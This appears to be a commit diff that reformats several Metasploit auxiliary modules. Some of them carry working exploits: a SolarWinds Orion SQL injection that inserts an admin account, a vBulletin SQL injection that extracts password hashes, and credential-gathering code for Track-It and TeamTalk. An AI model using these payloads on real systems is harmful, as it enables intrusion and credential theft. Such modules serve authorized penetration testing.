print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
store_cred(u,p)
store_cred(u, p)
end
end
modules/auxiliary/gather/search_email_collector.rb
+28 -25
View File
@@ -9,14 +9,18 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Search Engine Domain Email Address Collector',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Search Engine Domain Email Address Collector',
'Description' => %q{
This module uses Google, Bing and Yahoo to create a list of
valid email addresses for the target domain.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE))
valid email addresses for the target domain.
},
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
'License' => MSF_LICENSE
)
)
register_options(
[
@@ -26,15 +30,16 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('SEARCH_YAHOO', [ true, 'Enable Yahoo! as a backend search engine', true]),
OptString.new('OUTFILE', [ false, "A filename to store the generated email list"]),
])
]
)
register_advanced_options(
[
OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
])
OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>", nil]),
OptString.new('PROXY_USER', [ false, "Proxy Server User", nil]),
OptString.new('PROXY_PASS', [ false, "Proxy Server Password", nil])
]
)
end
# Search google.com for email's of target domain
@@ -43,10 +48,10 @@ class MetasploitModule < Msf::Auxiliary
response = ""
emails = []
header = { 'User-Agent' => Rex::UserAgent.session_agent }
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.google.com")
searches = ["100", "200","300", "400", "500"]
clnt = Net::HTTP::Proxy(@proxysrv, @proxyport, @proxyuser, @proxypass).new("www.google.com")
searches = ["100", "200", "300", "400", "500"]
searches.each { |num|
resp = clnt.get2("/search?hl=en&lr=&ie=UTF-8&q=%40"+targetdom+"&start=#{num}&sa=N&filter=0&num=100",header)
resp = clnt.get2("/search?hl=en&lr=&ie=UTF-8&q=%40" + targetdom + "&start=#{num}&sa=N&filter=0&num=100", header)
response << resp.body
}
print_status("Extracting emails from Google search results...")
@@ -63,12 +68,11 @@ class MetasploitModule < Msf::Auxiliary
response = ""
emails = []
header = { 'User-Agent' => Rex::UserAgent.session_agent }
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("search.yahoo.com")
searches = ["1", "101","201", "301", "401", "501"]
clnt = Net::HTTP::Proxy(@proxysrv, @proxyport, @proxyuser, @proxypass).new("search.yahoo.com")
searches = ["1", "101", "201", "301", "401", "501"]
searches.each { |num|
resp = clnt.get2("/search?p=%40#{targetdom}&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=p&fl=0&fr=yfp-t-152&xargs=0&pstart=1&b=#{num}",header)
resp = clnt.get2("/search?p=%40#{targetdom}&n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=all&vst=0&vf=all&vm=p&fl=0&fr=yfp-t-152&xargs=0&pstart=1&b=#{num}", header)
response << resp.body
}
print_status("Extracting emails from Yahoo search results...")
response.gsub!(/<.?b?[>]*>/, "")
@@ -84,11 +88,11 @@ class MetasploitModule < Msf::Auxiliary
response = ""
emails = []
header = { 'User-Agent' => Rex::UserAgent.session_agent }
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.bing.com")
clnt = Net::HTTP::Proxy(@proxysrv, @proxyport, @proxyuser, @proxypass).new("www.bing.com")
searches = 1
while searches < 201
begin
resp = clnt.get2("/search?q=%40#{targetdom}&first=#{searches.to_s}",header)
resp = clnt.get2("/search?q=%40#{targetdom}&first=#{searches.to_s}", header)
response << resp.body
rescue
end
@@ -112,15 +116,14 @@ class MetasploitModule < Msf::Auxiliary
def run
if datastore['PROXY']
@proxysrv,@proxyport = datastore['PROXY'].split(":")
@proxysrv, @proxyport = datastore['PROXY'].split(":")
@proxyuser = datastore['PROXY_USER']
@proxypass = datastore['PROXY_PASS']
else
@proxysrv,@proxyport = nil, nil
@proxysrv, @proxyport = nil, nil
end
print_status("Harvesting emails .....")
target = datastore['DOMAIN']
emails = []
modules/auxiliary/gather/searchengine_subdomains_collector.rb
+26 -11
View File
@@ -8,14 +8,18 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Search Engine Subdomains Collector',
'Description' => %q(
This module can be used to gather subdomains about a domain
from Yahoo, Bing.
),
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE))
super(
update_info(
info,
'Name' => 'Search Engine Subdomains Collector',
'Description' => %q{
This module can be used to gather subdomains about a domain
from Yahoo, Bing.
},
'Author' => [ 'Nixawk' ],
'License' => MSF_LICENSE
)
)
deregister_http_client_options
@@ -25,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('IP_SEARCH', [ false, "Enable ip of subdomains to locate subdomains", true]),
OptBool.new('ENUM_BING', [ true, "Enable Bing Search Subdomains", true]),
OptBool.new('ENUM_YAHOO', [ true, "Enable Yahoo Search Subdomains", true])
])
]
)
end
def rhost_yahoo
@@ -85,14 +90,17 @@ class MetasploitModule < Msf::Auxiliary
'setlang' => 'en-us',
'first' => num,
'q' => dork
})
}
)
next unless resp && resp.code == 200
html = resp.get_html_document
matches = html.search('cite')
matches.each do |match|
result = uri2domain(match.text)
next unless result
result.to_s.downcase!
results << result
end
@@ -120,9 +128,11 @@ class MetasploitModule < Msf::Auxiliary
'pz' => 100,
'p' => dork,
'b' => num
})
}
)
next unless resp && resp.code == 200
html = resp.get_html_document
matches = html.search('span[@class=" fz-15px fw-m fc-12th wr-bw lh-15"]')
matches.each do |match|
@@ -130,6 +140,7 @@ class MetasploitModule < Msf::Auxiliary
result = result.split('/')[0]
result = result.split(':')[0]
next unless result
result.to_s.downcase!
results << result
end
@@ -150,20 +161,24 @@ class MetasploitModule < Msf::Auxiliary
results |= yahoo_search(dork) if datastore['ENUM_YAHOO']
return domains if results.nil? || results.empty?
results.each do |subdomain|
next if domains.include?(subdomain)
next unless valid_result?(target, subdomain)
print_good("#{dork} subdomain: #{subdomain}")
if ipv4
domains[subdomain] = [target]
else
ips = domain2ip(subdomain)
next if ips.empty?
domains[subdomain] = ips
ips.each { |ip| search_subdomains(ip) } if !ips.empty? && datastore['IP_SEARCH']
end
end
return if domains.empty?
report_note(host: target, type: 'Subdomains', update: :unique_data, data: domains)
end
modules/auxiliary/gather/shodan_honeyscore.rb
+23 -22
View File
@@ -6,24 +6,24 @@
class MetasploitModule < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Shodan Honeyscore Client',
'Description' => %q{
This module uses the shodan API to check
if a server is a honeypot or not. The api
returns a score from 0.0 to 1.0. 1.0 being a honeypot.
A shodan API key is needed for this module to work properly.
super(
update_info(
info,
'Name' => 'Shodan Honeyscore Client',
'Description' => %q{
This module uses the shodan API to check
if a server is a honeypot or not. The api
returns a score from 0.0 to 1.0. 1.0 being a honeypot.
A shodan API key is needed for this module to work properly.
If you don't have an account, go here to register:
https://account.shodan.io/register
For more info on how their honeyscore system works, go here:
https://honeyscore.shodan.io/
},
'Author' =>
[ 'thecarterb' ], # Thanks to @rwhitcroft, @h00die and @wvu-r7 for the improvements and review!
'License' => MSF_LICENSE,
'References' =>
[
If you don't have an account, go here to register:
https://account.shodan.io/register
For more info on how their honeyscore system works, go here:
https://honeyscore.shodan.io/
},
'Author' => [ 'thecarterb' ], # Thanks to @rwhitcroft, @h00die and @wvu-r7 for the improvements and review!
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://honeyscore.shodan.io/']
]
)
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
[
OptString.new('TARGET', [true, 'The target to get the score of']),
OptString.new('SHODAN_APIKEY', [true, 'The SHODAN API key'])
])
]
)
end
def print_score(score)
@@ -60,9 +61,9 @@ class MetasploitModule < Msf::Auxiliary
cli = Rex::Proto::Http::Client.new('api.shodan.io', 443, {}, true)
cli.connect
req = cli.request_cgi({
'uri' => "/labs/honeyscore/#{tgt}?key=#{key}",
'uri' => "/labs/honeyscore/#{tgt}?key=#{key}",
'method' => 'GET'
})
})
res = cli.send_recv(req)
cli.close
if res.nil?
@@ -74,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
return
end
score = res.body.to_f # Change the score to a float to be able to determine value in the checks
score = res.body.to_f # Change the score to a float to be able to determine value in the checks
if score == 0
print_error("#{tgt} is not a honeypot")
@@ -86,7 +87,7 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{tgt} is probably a honeypot")
elsif score == 1.0
print_good("#{tgt} is definitely a honeypot")
else # We shouldn't ever get here as the previous checks should catch an unexpected response
else # We shouldn't ever get here as the previous checks should catch an unexpected response
print_error('An unexpected error occurred.')
return
end
modules/auxiliary/gather/shodan_search.rb
+38 -38
View File
@@ -11,26 +11,27 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Shodan Search',
'Description' => %q{
This module uses the Shodan API to search Shodan. Accounts are free
and an API key is required to use this module. Output from the module
is displayed to the screen and can be saved to a file or the MSF database.
NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in
queries, but there are limitations when used with a free API key. Please
see the Shodan site for more information.
Shodan website: https://www.shodan.io/
API: https://developer.shodan.io/api
Filters: https://www.shodan.io/search/filters
Facets: https://www.shodan.io/search/facet (from the scrollbox)
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'Shodan Search',
'Description' => %q{
This module uses the Shodan API to search Shodan. Accounts are free
and an API key is required to use this module. Output from the module
is displayed to the screen and can be saved to a file or the MSF database.
NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in
queries, but there are limitations when used with a free API key. Please
see the Shodan site for more information.
Shodan website: https://www.shodan.io/
API: https://developer.shodan.io/api
Filters: https://www.shodan.io/search/filters
Facets: https://www.shodan.io/search/facet (from the scrollbox)
},
'Author' => [
'John H Sawyer <john[at]sploitlab.com>', # InGuardians, Inc.
'sinn3r' # Metasploit-fu plus other features
'sinn3r' # Metasploit-fu plus other features
],
'License' => MSF_LICENSE
'License' => MSF_LICENSE
)
)
@@ -155,7 +156,7 @@ class MetasploitModule < Msf::Auxiliary
)
print_status("Total: #{results[first_page]['total']} on #{tpages} " \
'pages. Showing facets')
facet = results.dig(first_page,'facets')
facet = results.dig(first_page, 'facets')
facet.each do |name, list|
list.each do |f|
facets_tbl << [name.to_s, (f['value']).to_s, (f['count']).to_s]
@@ -172,18 +173,19 @@ class MetasploitModule < Msf::Auxiliary
if results[first_page]['total'] > 100
page = 1
while page < maxpage
page_result = shodan_query(apikey, query, facets, page+1)
page_result = shodan_query(apikey, query, facets, page + 1)
if page_result['matches'].nil?
next
end
results[page] = page_result
page += 1
end
end
# Save the results to this table
tbl = Rex::Text::Table.new(
'Header' => 'Search Results',
'Indent' => 1,
'Header' => 'Search Results',
'Indent' => 1,
'Columns' => ['IP:Port', 'City', 'Country', 'Hostname']
)
@@ -191,36 +193,34 @@ class MetasploitModule < Msf::Auxiliary
regex = datastore['REGEX'] if datastore['REGEX']
results.each do |page|
page['matches'].each do |host|
city = host.dig('location','city') || 'N/A'
ip = host.fetch('ip_str', 'N/A')
city = host.dig('location', 'city') || 'N/A'
ip = host.fetch('ip_str', 'N/A')
port = host.fetch('port', '')
country = host.dig('location','country_name') || 'N/A'
hostname = host.dig('hostnames',0)
country = host.dig('location', 'country_name') || 'N/A'
hostname = host.dig('hostnames', 0)
data = host.dig('data')
report_host(:host => ip,
:name => hostname,
report_host(:host => ip,
:name => hostname,
:comments => 'Added from Shodan',
:info => host.dig('info')
) if datastore['DATABASE']
:info => host.dig('info')) if datastore['DATABASE']
report_service(:host => ip,
:port => port,
:info => 'Added from Shodan'
) if datastore['DATABASE']
:port => port,
:info => 'Added from Shodan') if datastore['DATABASE']
if ip =~ regex ||
city =~ regex ||
country =~ regex ||
hostname =~ regex ||
data =~ regex
city =~ regex ||
country =~ regex ||
hostname =~ regex ||
data =~ regex
# Unfortunately we cannot display the banner properly,
# because it messes with our output format
tbl << ["#{ip}:#{port}", city, country, hostname]
end
end
end
#Show data and maybe save it if needed
# Show data and maybe save it if needed
print_line()
print_line("#{tbl}")
save_output(tbl) if datastore['OUTFILE']
modules/auxiliary/gather/snare_registry.rb
+19 -16
View File
@@ -10,25 +10,27 @@ class MetasploitModule < Msf::Auxiliary
HttpFingerprint = { :pattern => [ /SNARE/ ] }
def initialize(info = {})
super(update_info(info,
'Name' => 'Snare Lite for Windows Registry Access',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Snare Lite for Windows Registry Access',
'Description' => %q{
This module uses the Registry Dump feature of the Snare Lite
for Windows service on 6161/TCP to retrieve the Windows registry.
The Dump Registry functionality is unavailable in Snare Enterprise.
for Windows service on 6161/TCP to retrieve the Windows registry.
The Dump Registry functionality is unavailable in Snare Enterprise.
Note: The Dump Registry functionality accepts only one connected
client at a time. Requesting a large key/hive will cause the service
to become unresponsive until the server completes the request.
},
'Platform' => 'win',
'Author' => [ 'bcoles' ],
'License' => MSF_LICENSE,
'References' =>
[
Note: The Dump Registry functionality accepts only one connected
client at a time. Requesting a large key/hive will cause the service
to become unresponsive until the server completes the request.
},
'Platform' => 'win',
'Author' => [ 'bcoles' ],
'License' => MSF_LICENSE,
'References' => [
[ 'URL', 'https://www.intersectalliance.com/wp-content/uploads/user_guides/Guide_to_Snare_for_Windows-4.2.pdf' ]
]
))
)
)
register_options(
[
@@ -38,7 +40,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('REG_DUMP_KEY', [ false, 'Retrieve this registry key and all sub-keys', 'HKLM\\HARDWARE\\DESCRIPTION\\System' ]),
OptBool.new('REG_DUMP_ALL', [false, 'Retrieve the entire Windows registry', false]),
OptInt.new('TIMEOUT', [true, 'Timeout in seconds for downloading each registry key/hive', 300])
])
]
)
end
def run
modules/auxiliary/gather/solarwinds_orion_sqli.rb
+19 -19
View File
@@ -7,23 +7,24 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation',
'Description' => %q{
This module exploits a stacked SQL injection in order to add an administrator user to the
SolarWinds Orion database.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry' #discovery/metasploit module
super(
update_info(
info,
'Name' => 'Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation',
'Description' => %q{
This module exploits a stacked SQL injection in order to add an administrator user to the
SolarWinds Orion database.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry' # discovery/metasploit module
],
'References' =>
[
'References' => [
['CVE', '2014-9566']
],
'DisclosureDate' => '2015-02-24'
))
'DisclosureDate' => '2015-02-24'
)
)
register_options(
[
@@ -31,12 +32,11 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('TARGETURI', [ true, "Base Orion directory path", '/']),
OptString.new('USERNAME', [true, 'The username to authenticate as', 'Guest']),
OptString.new('PASSWORD', [false, 'The password to authenticate with', ''])
])
]
)
end
def login (username,password)
def login(username, password)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx')
})
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
'uri' => normalize_uri(target_uri.path, 'Orion', 'Services', 'AccountManagement.asmx' '/GetAccounts'),
'method' => 'POST',
'vars_get' => {
'sort' => 'Accounts.AccountID', #also vulnerable
'sort' => 'Accounts.AccountID', # also vulnerable
'dir' => "ASC;insert into accounts values ('#{username}', '127-510823478-74417-8', '/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==', 'Feb 1 2100 12:00AM', 'Y', '#{username}', 1, '', '', 1, -1, 8, -1, 4, 0, 0, 0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '', 0, '');"
},
'data' => '{"accountId":""}',
modules/auxiliary/gather/ssllabs_scan.rb
+36 -32
View File
@@ -33,10 +33,10 @@ class MetasploitModule < Msf::Auxiliary
cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS')
cli.connect
req = cli.request_cgi({
'uri' => uri,
'agent' => user_agent,
'method' => 'GET',
'vars_get' => params
'uri' => uri,
'agent' => user_agent,
'method' => 'GET',
'vars_get' => params
})
res = cli.send_recv(req)
cli.close
@@ -46,6 +46,7 @@ class MetasploitModule < Msf::Auxiliary
@current_assessments = res.headers['X-Current-Assessments']
r = JSON.load(res.body)
fail InvocationError, "API returned: #{r['errors']}" if r.key?('errors')
return r
end
@@ -66,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
end
def report_unused_attrs(type, unused_attrs)
unused_attrs.each do | attr |
unused_attrs.each do |attr|
# $stderr.puts "#{type} request returned unknown parameter #{attr}"
end
end
@@ -462,24 +463,25 @@ class MetasploitModule < Msf::Auxiliary
end
def initialize(info = {})
super(update_info(info,
'Name' => 'SSL Labs API Client',
'Description' => %q{
super(
update_info(
info,
'Name' => 'SSL Labs API Client',
'Description' => %q{
This module is a simple client for the SSL Labs APIs, designed for
SSL/TLS assessment during a penetration test.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Denis Kolegov <dnkolegov[at]gmail.com>',
'Francois Chagnon' # ssllab.rb author (https://github.com/Shopify/ssllabs.rb)
],
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true,
}
))
'License' => MSF_LICENSE,
'Author' => [
'Denis Kolegov <dnkolegov[at]gmail.com>',
'Francois Chagnon' # ssllab.rb author (https://github.com/Shopify/ssllabs.rb)
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
}
)
)
register_options(
[
OptString.new('HOSTNAME', [true, 'The target hostname']),
@@ -487,7 +489,8 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]),
OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]),
OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true])
])
]
)
end
def report_good(line)
@@ -734,6 +737,7 @@ class MetasploitModule < Msf::Auxiliary
def output_common_info(r)
return unless r
print_status "Host: #{r.host}"
r.endpoints.each do |e|
@@ -743,6 +747,7 @@ class MetasploitModule < Msf::Auxiliary
def output_result(r, grade)
return unless r
output_common_info(r)
if grade
output_grades_only(r)
@@ -847,16 +852,15 @@ class MetasploitModule < Msf::Auxiliary
sleep delay
r = api.analyse(host: hostname, all: 'done')
end
rescue RequestRateTooHigh
print_error "Request rate is too high, please slow down"
rescue InternalError
print_error "Service encountered an error, sleep 5 minutes"
rescue ServiceNotAvailable
print_error "Service is not available, sleep 15 minutes"
rescue ServiceOverloaded
print_error "Service is overloaded, sleep 30 minutes"
rescue
print_error "Invalid parameters"
rescue RequestRateTooHigh
print_error "Request rate is too high, please slow down"
rescue InternalError
print_error "Service encountered an error, sleep 5 minutes"
rescue ServiceNotAvailable
print_error "Service is not available, sleep 15 minutes"
rescue ServiceOverloaded
print_error "Service is overloaded, sleep 30 minutes"
rescue
print_error "Invalid parameters"
end
end
modules/auxiliary/gather/teamtalk_creds.rb
+34 -31
View File
@@ -8,23 +8,26 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'TeamTalk Gather Credentials',
'Description' => %q{
This module retrieves user credentials from BearWare TeamTalk.
super(
update_info(
info,
'Name' => 'TeamTalk Gather Credentials',
'Description' => %q{
This module retrieves user credentials from BearWare TeamTalk.
Valid administrator credentials are required.
Valid administrator credentials are required.
This module has been tested successfully on TeamTalk versions
5.2.2.4885 and 5.2.3.4893.
},
'Author' => 'bcoles',
'References' =>
[
This module has been tested successfully on TeamTalk versions
5.2.2.4885 and 5.2.3.4893.
},
'Author' => 'bcoles',
'References' => [
# Protocol documentation
['URL', 'https://github.com/BearWare/TeamTalk5/blob/master/ttphpadmin/tt5admin.php']
],
'License' => MSF_LICENSE))
'License' => MSF_LICENSE
)
)
register_options [
Opt::RPORT(10333),
OptString.new('USERNAME', [true, 'The username for TeamTalk', 'admin']),
@@ -44,10 +47,10 @@ class MetasploitModule < Msf::Auxiliary
print_status "Found TeamTalk (protocol version #{$1})"
report_service :host => rhost,
:port => rport,
report_service :host => rhost,
:port => rport,
:proto => 'tcp',
:name => 'teamtalk'
:name => 'teamtalk'
vprint_status "Authenticating as '#{username}'"
@@ -80,8 +83,8 @@ class MetasploitModule < Msf::Auxiliary
return
end
cred_table = Rex::Text::Table.new 'Header' => 'TeamTalk User Credentials',
'Indent' => 1,
cred_table = Rex::Text::Table.new 'Header' => 'TeamTalk User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Password', 'Type']
res.each_line do |line|
@@ -93,10 +96,10 @@ class MetasploitModule < Msf::Auxiliary
type = line.scan(/\s+usertype=(\d+)\s+/).flatten.first
cred_table << [ user, pass, type ]
report_cred user: user,
report_cred user: user,
password: pass,
type: type,
proof: line
type: type,
proof: line
end
if cred_table.rows.empty?
@@ -133,26 +136,26 @@ class MetasploitModule < Msf::Auxiliary
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
address: rhost,
port: rport,
service_name: 'teamtalk',
protocol: 'tcp',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge service_data
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
access_level: opts[:type],
proof: opts[:proof]
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
access_level: opts[:type],
proof: opts[:proof]
}.merge service_data
create_credential_login login_data
modules/auxiliary/gather/trackit_sql_domain_creds.rb
+35 -36
View File
@@ -10,37 +10,38 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure',
'Description' => %q{
This module exploits an unauthenticated configuration retrieval .NET remoting
service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain
Administrator and the SQL server user credentials.
This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
10.0.0.143 and 9.0.30.248.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure',
'Description' => %q{
This module exploits an unauthenticated configuration retrieval .NET remoting
service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain
Administrator and the SQL server user credentials.
This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
10.0.0.143 and 9.0.30.248.
},
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2014-4872' ],
[ 'OSVDB', '112741' ],
[ 'US-CERT-VU', '121036' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2014/Oct/34' ]
],
'DisclosureDate' => '2014-10-07'
))
'DisclosureDate' => '2014-10-07'
)
)
register_options(
[
OptPort.new('RPORT',
[true, '.NET remoting service port', 9010])
])
[true, '.NET remoting service port', 9010])
]
)
end
def prepare_packet(bmc)
#
# ConfigurationService packet structure:
@@ -71,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary
# - DomainAdminUserName
# - DomainAdminEncryptedPassword
#
packet_header_pre_packet_size= [
packet_header_pre_packet_size = [
0x2e, 0x4e, 0x45, 0x54, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00
]
@@ -105,9 +106,9 @@ class MetasploitModule < Msf::Auxiliary
@packet_terminator = [ 0x0b ]
service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/,(bmc ? "Trackit" : "Numara.TrackIt"))
method = "GetProductDeploymentValues".gsub(/TrackIt/,(bmc ? "Trackit" : "Numara.TrackIt"))
type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(bmc ? "TrackIt" : "Numara.TrackIt"))
service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/, (bmc ? "Trackit" : "Numara.TrackIt"))
method = "GetProductDeploymentValues".gsub(/TrackIt/, (bmc ? "Trackit" : "Numara.TrackIt"))
type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/, (bmc ? "TrackIt" : "Numara.TrackIt"))
uri = "tcp://" + rhost + ":" + rport.to_s + "/" + service
@@ -154,15 +155,15 @@ class MetasploitModule < Msf::Auxiliary
return buf
end
def fill_loot_from_packet(packet_reply, loot)
loot.each_key { |str|
if loot[str] != nil
next
end
if (index = (packet_reply.index(str))) != nil
# after str, discard 5 bytes then get str_value
size = packet_reply[index + str.length + 5,1].unpack('C*')[0]
size = packet_reply[index + str.length + 5, 1].unpack('C*')[0]
if size == 255
# if we received 0xFF then there is no value for this str
# set it to empty but not nil so that we don't look for it again
@@ -174,7 +175,6 @@ class MetasploitModule < Msf::Auxiliary
}
end
def run
packet = prepare_packet(true)
@@ -290,13 +290,13 @@ class MetasploitModule < Msf::Auxiliary
end
credential_core = report_credential_core({
password: loot[database_pw],
username: loot[schema_owner],
sid: sid
})
password: loot[database_pw],
username: loot[schema_owner],
sid: sid
})
# Get just the hostname
db_address= loot[database_server_name].split('\\')[0]
db_address = loot[database_server_name].split('\\')[0]
begin
database_login_data = {
@@ -334,8 +334,7 @@ class MetasploitModule < Msf::Auxiliary
end
end
def report_credential_core(cred_opts={})
def report_credential_core(cred_opts = {})
# Set up the has for our Origin service
origin_service_data = {
address: rhost,
@@ -360,9 +359,9 @@ class MetasploitModule < Msf::Auxiliary
})
elsif cred_opts[:sid]
credential_data.merge!({
realm_key: Metasploit::Model::Realm::Key::ORACLE_SYSTEM_IDENTIFIER,
realm_value: cred_opts[:sid]
})
realm_key: Metasploit::Model::Realm::Key::ORACLE_SYSTEM_IDENTIFIER,
realm_value: cred_opts[:sid]
})
end
credential_data.merge!(origin_service_data)
modules/auxiliary/gather/vbulletin_vote_sqli.rb
+27 -27
View File
@@ -8,31 +8,32 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBulletin Password Collector via nodeid SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has been
used in the wild since March 2013. This module can be used to extract the web application's
usernames and hashes, which could be used to authenticate into the vBulletin admin control
panel.
},
'References' =>
[
super(
update_info(
info,
'Name' => 'vBulletin Password Collector via nodeid SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability found in vBulletin 5 that has been
used in the wild since March 2013. This module can be used to extract the web application's
usernames and hashes, which could be used to authenticate into the vBulletin admin control
panel.
},
'References' => [
[ 'CVE', '2013-3522' ],
[ 'OSVDB', '92031' ],
[ 'EDB', '24882' ],
[ 'BID', '58754' ],
[ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
],
'Author' =>
[
'Author' => [
'Orestis Kourides', # Vulnerability discovery and PoC
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-03-24'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-03-24'
)
)
register_options(
[
@@ -40,7 +41,8 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new("NODE", [false, 'Valid Node ID']),
OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
])
]
)
end
def exists_node?(id)
@@ -95,13 +97,13 @@ class MetasploitModule < Msf::Auxiliary
injection << "AND (#{random_and}=#{random_and}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
'vars_post' =>
{
'nodeid' => "#{node}#{injection}",
'nodeid' => "#{node}#{injection}",
}
})
})
unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
return nil
@@ -117,9 +119,9 @@ class MetasploitModule < Msf::Auxiliary
end
def get_user_data(node_id, user_id)
user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")
user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id + 1}")
pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id + 1}")
salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id + 1}")
return [user, pass, salt]
end
@@ -187,8 +189,8 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{count_users} users found. Collecting credentials...")
users_table = Rex::Text::Table.new(
'Header' => 'vBulletin Users',
